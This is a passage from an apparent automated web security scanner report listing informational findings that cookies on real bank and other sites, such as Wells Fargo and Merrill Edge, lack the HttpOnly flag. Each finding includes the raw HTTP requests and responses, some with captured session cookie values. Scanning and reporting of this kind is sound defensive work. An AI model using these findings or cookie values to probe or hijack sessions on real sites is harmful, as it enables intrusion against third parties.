set-cookie: SMIDENTITY=KDC8DK5B+KFv3Wz0S4K2LXSI4NgojmEdX2lulfZHWNW5jh+8BzJJh8KHjWLs1JqTo+0StslhsZtq4lyyEMIl0GAzy4I5jHURcU1INosJRPZPUqnycZXXkgvlWX/bMnXF1SioazWzlZBumjo782mfcGOSGzZ6T2j52k8DJwFasAcEq6ZcsHEQxgNk+ah8BOdvTcviU2WAGv0G+CeQus7N0onu+TGDhQ0W39ik0Cg9UB3KRVXs2KbKjqellsaunYWAIq1kwbkhHpHXGKLQUsg3glJkNpgNxmSQiWiC4o+mK7ggegysuL3PcK5zTI1Iw9XexI9N8wLqYLNQUz/0jdrKZmkQ0Ip2Zm1FhMKWvXjkVhktzIcKIr/IcMNQa8XEdZ7JERXHmTOamI52E0ET2IBtTGVVEeUOdGrvQiyegTguDsbQD4MSTWmYQ7ZXGSyXgruiBshchcGbOLHIKS6SvFT7pgjTnLK9JScdNdpYCvCG9cjkUtFjpNOSVxi1bKz5Xu8TO49YSSs9iFmlCix8Q1nG2I+rzTBtxIyWVW1GT9AoeRDYu5HzhJKISmwaX2qvWrTBe014K56+FA4eWCo9BOF9XQlpxTB1WpVbsoxwa3Rg7LNsq9S1GpNb8XRTJtfcmDvw; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx
Set-Cookie: pxs=671d45371feb47b7b0d445f52cd92025; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 101016


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...

11.669. https://www.myschedule.navyfederal.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myschedule.navyfederal.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.myschedule.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 15100
Content-Type: text/html
Content-Location: http://www.myschedule.navyfederal.org/Default.htm
Last-Modified: Wed, 07 Nov 2001 15:10:00 GMT
Accept-Ranges: bytes
ETag: "014cf449e67c11:5e8"
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:19:30 GMT
Connection: close
Set-Cookie: TS26bd7b=a65ecccc74731a368fe90c1afa57c1bee8233e9e4dea5aa14d49d874; Path=/

<HTML>
<HEAD><meta scheme='a1afcc517bec909bf5c3fddea7c83c3d' name='TS26bd7b' content='fcdfb7ae7487b17f' /><!--9cc5da25f89a21d1fbb5ffa18da0bb73--><script type="text/javascript">if(window.addEventListe
...[SNIP]...

11.670. http://www.omniture.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Omniture AWS/2.0.0
Location: http://www.omniture.com/en/
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 01:17:24 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.omniture.com
...[SNIP]...

11.671. http://www.omniture.com/privacy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /privacy/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy/ HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Omniture AWS/2.0.0
Location: http://www.omniture.com/en/privacy/
Content-Length: 321
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 22:20:01 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.omniture.com
...[SNIP]...

11.672. https://www.pnccardservicesonline.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnccardservicesonline.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.pnccardservicesonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:20:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: DefaultBrand=NatCityMain; expires=Thu, 02-Feb-2012 22:20:17 GMT; path=/; secure
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 12377


<HTML>
   <HEAD>
       <title>Log In</title>
       <LINK id="styleSheet" href="/CSS.aspx?Brand=NatCityMain" type="text/css" rel="stylesheet"></LINK>
   </HEAD>
   <body leftMargin="0" topMargin="0" marginwid
...[SNIP]...

11.673. http://www.projo.com/opinion/contributors/content/CT_nefish_01-11-11_ORLPT84_v8.4117508.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.projo.com
Path:   /opinion/contributors/content/CT_nefish_01-11-11_ORLPT84_v8.4117508.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /opinion/contributors/content/CT_nefish_01-11-11_ORLPT84_v8.4117508.html HTTP/1.1
Host: www.projo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:29 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: now
Cache-Control: no-cache,no-store,private,must-revalidate
Pragma: no-cache
P3P: policyref="http://ads.belointeractive.com/w3c/p3p.xml", CP="NOI DSP CUR ADMa DEVa TAIa OUR IND UNI COM NAV INT"
Keep-Alive: timeout=600
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_xfcdmvtufs=dddbcc5b3660;Version=1;path=/
Content-Length: 75680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:pas="http://www.projo.com/200
...[SNIP]...

11.674. http://www.retirement.merrilledge.com/IRA/pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /IRA/pages/home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /IRA/pages/home.aspx HTTP/1.1
Host: www.retirement.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=bYx6oMVfj9kBcCnXRIC7QuWJObofc+Jaq1A5qqoNbP0HE17ytE7Cx6dx0Vbp+Q/E4cPLbF/R9fXTivraTbY10kYDMjDKAxqQRqieQ3mRWgd2QAy2Nyutp7h3RsSMRpGoNb7B4AMxcb4mjelZGvPbqRcR5jGg43CsqRiqk18bI142IGn7nOxKkbOigS1lSoeHsoGaDP9pQTGT5HUtMuiOkt9S5BP4o+t3WUZsSIFeoBg9qKr8E2yq31e2xZVOVmCr9ZS17eAH1TH3qjerMtqmLqHOZH41tqHJZx+Hq1fpVIOXyYbhvoo/Lp9isRNY2sWPpisgLr18HAg3XN9sDFyPAOQ//piYBQLzGAyi1vKQGdsV5+R/lUCvf/q8L6l7W9bnrWRRa9AWjB2+tWtePdOU7eeQpBO/4AcZ/BPW3/7SC9Hz+gHejvNiOsyC6XZQu5pZ/jH7Wm3fQd4+XTCa7boPBGXKXHSNFdtZLNQl1ayww21G2zokvCUEM5aE0VB/wk9zbEUeYA2eFXBYaLJ5DtrW4BUNtwvskBAFPrrqc//mU/6S950OeuWSXE6D82+AeUSOiMVuRyuVEsdx75ZV4zf5G6KdlZxf+ne5+yzcTKPPGFXKjEsnshCBE3NPmGygmWqO; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=bb8b1b67ca344027b65d9c9f791d0fa5; domain=.merrilledge.com; path=/
Set-Cookie: BrowserCheckDone=true; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 36258


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...

11.675. http://www.sony.com/sonycard/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sony.com
Path:   /sonycard/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sonycard/ HTTP/1.1
Host: www.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:20:27 GMT
Server: Apache
Location: https://www.sonyrewards.com/sonycard
Content-Length: 306
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_xxx.tpo`.dpn-mc-80=449b232f3660;Version=1;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.sonyrewards
...[SNIP]...

11.676. http://www.totalmerrill.com/TotalMerrill/pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalmerrill.com
Path:   /TotalMerrill/pages/home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TotalMerrill/pages/home.aspx HTTP/1.1
Host: www.totalmerrill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 35056
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=s4zK1Ge0SqHHKynqb5orE0Zg/uL5gCQTwxLXpewRGggd8mTC6BRKDQCPNMy7S/rW8VNz6DQ76MbLuVeBKTGxYNHytG/9FzIC1SYscEp1Q/b38ha7WH9vuzLsjNLGrPr5NHXxPZya/2xPDgSIV9Ssr8Xw5DcLTEltSPoYTT2vjfsX/YxXl/koPBWTMrO2TrvFxqPEeNKecZaEIhFSugfB49w5BNbxtfGtMDpg3KkGxd7Tz0kWBXThtNCZU8jF0hkKb8ZyuZSX4X+yy/nSuSUuBJosuozhqMOvoRmuO935NMIjQ3apZkCKYRrFP8ba/9CYsnkIWtVrM1VBkgtTGi7mwY7A67FmQIqDgxk1IUn0TJR/ywq6V2DnENEdjPA5fM6+ItTKWl31Nh+hdNm7UY6XxvFc8suP4pjrRsyrgQKLZcKZu7VYBxl02Fvt5bW+pAp5SvL6St36bHn2duMcQEp2cFDczofvDrgxfMsXGrQaOVR5AO6R3RgABndj4xf/hlubUaSNLF/FQ/Exy0c4umYjC6fh2RTzf5DWl6WRS80UKNBJ7bQIu0Zbg34A/U1aK1YDqeiWnItrkmu3Eg14KLSxi9s5VNseNm3+A6WrAlzToIViSrXpDiglowddSci7pIYw; path=/; domain=.totalmerrill.com
X-AspNet-Version: 2.0.50727
Set-Cookie: TM_PUID=5497c089-72bd-4056-993e-a48a686537cf; domain=.TotalMerrill.com; expires=Tue, 02-Feb-2021 22:20:28 GMT; path=/
Date: Wed, 02 Feb 2011 22:20:29 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.677. http://www.universalbot.com/supported-bots/forum-posting-bots/ipboard-software  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.universalbot.com
Path:   /supported-bots/forum-posting-bots/ipboard-software

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /supported-bots/forum-posting-bots/ipboard-software HTTP/1.1
Host: www.universalbot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 07ea8e9c6c6b4815a2b15bba5c0035ed=f727505d493a98b8f369b1124d09e0d7; path=/
Last-Modified: Wed, 02 Feb 2011 23:45:22 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=
...[SNIP]...

11.678. http://www.ustrust.com/ust/pages/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ustrust.com
Path:   /ust/pages/index.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ust/pages/index.aspx HTTP/1.1
Host: www.ustrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 16560
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TM_PUID=958311fb-b895-4038-88f5-33108f266ab7; domain=.TotalMerrill.com; expires=Tue, 02-Feb-2021 22:20:42 GMT; path=/
Date: Wed, 02 Feb 2011 22:20:41 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...

11.679. http://www.wachovia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wachovia.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.wachovia.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:00:05 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=CB01F7F42F17102FA757AB53C440707C; Path=/; Domain=.wachovia.com
Location: https://www.wachovia.com/
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 233

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.wachovia.co
...[SNIP]...

11.680. http://www.wcti12.com/news/26551757/detail.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcti12.com
Path:   /news/26551757/detail.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/26551757/detail.html HTTP/1.1
Host: www.wcti12.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Length: 45691
Content-Type: text/html
Set-Cookie: alpha=35ce8f186d5f00002e024a4d32200c00e6bc0100; expires=Sun, 31-Jan-2021 01:17:34 GMT; path=/; domain=.wcti12.com
X-IBS-CCDS-VERSION: 2.16.16
X-IBS-CCDS-ORIGIN: origin131
X-Flow: xslt-in-production
Cache-Control: max-age=596
Expires: Thu, 03 Feb 2011 01:27:30 GMT
Date: Thu, 03 Feb 2011 01:17:34 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="no-js">
<head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...

11.681. http://www.wellsfargo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wellsfargo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.wellsfargo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:00:54 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: v1st=EF949CC12A6233AB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Location: https://www.wellsfargo.com/


11.682. https://www.wellsfargo.com/Clickthrough&RequestType=Click&COID=  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /Clickthrough&RequestType=Click&COID=

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Clickthrough&RequestType=Click&COID= HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 404 Not found
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:03 GMT
Content-length: 3018
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

11.683. https://www.wellsfargo.com/about/diversity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /about/diversity/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about/diversity/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:27 GMT
Content-length: 8581
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=FY7dNJhH8RGtvgN8pvr6lX4lzZGNk421hDYK0F55Yk6vq3xThh62!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>About Wells Fargo - Diversity
...[SNIP]...

11.684. https://www.wellsfargo.com/autoloans/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /autoloans/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /autoloans/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:48 GMT
Content-length: 11460
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=KwsQNJhcppJbXh2HGTsl1xSTLrXLWgsZLDGy5r0NvKM6nG1NGQ1j!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Auto Loans ... Wells F
...[SNIP]...

11.685. https://www.wellsfargo.com/autoloans/apply  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /autoloans/apply

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /autoloans/apply HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 301 Moved Permanently
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:49 GMT
Content-length: 15
Content-type: text/html; charset=ISO-8859-1
X-Cnection: close
Location: https://financial.wellsfargo.com/autoapp/tostep1.do?promocode=WLAA11040010
Set-Cookie: wcmcookiewf=Fv9vNJhdHXqhTvtpGZyxXhXVBryX2GtWB5ZTb3zZv6w3Q0v3XypL!1507309987; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/
Connection: close


                                   

11.686. https://www.wellsfargo.com/browser/jaws_setting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /browser/jaws_setting

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /browser/jaws_setting HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:19 GMT
Content-length: 3286
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=gCGwNJhfWxmh2NDPMGhQzzBB1njKkFyRGKJNnjbmVQ2rzhccQTt5!-1657447489; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

11.687. https://www.wellsfargo.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /careers/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /careers/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:00 GMT
Content-length: 7617
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=sG2NNJhL8zpPgGJdS0NpchvpTRWLPJr0HLnS3ss5SYWfnJWcs2V7!1746616152; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Careers</t
...[SNIP]...

11.688. https://www.wellsfargo.com/checking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /checking/

Issue detail

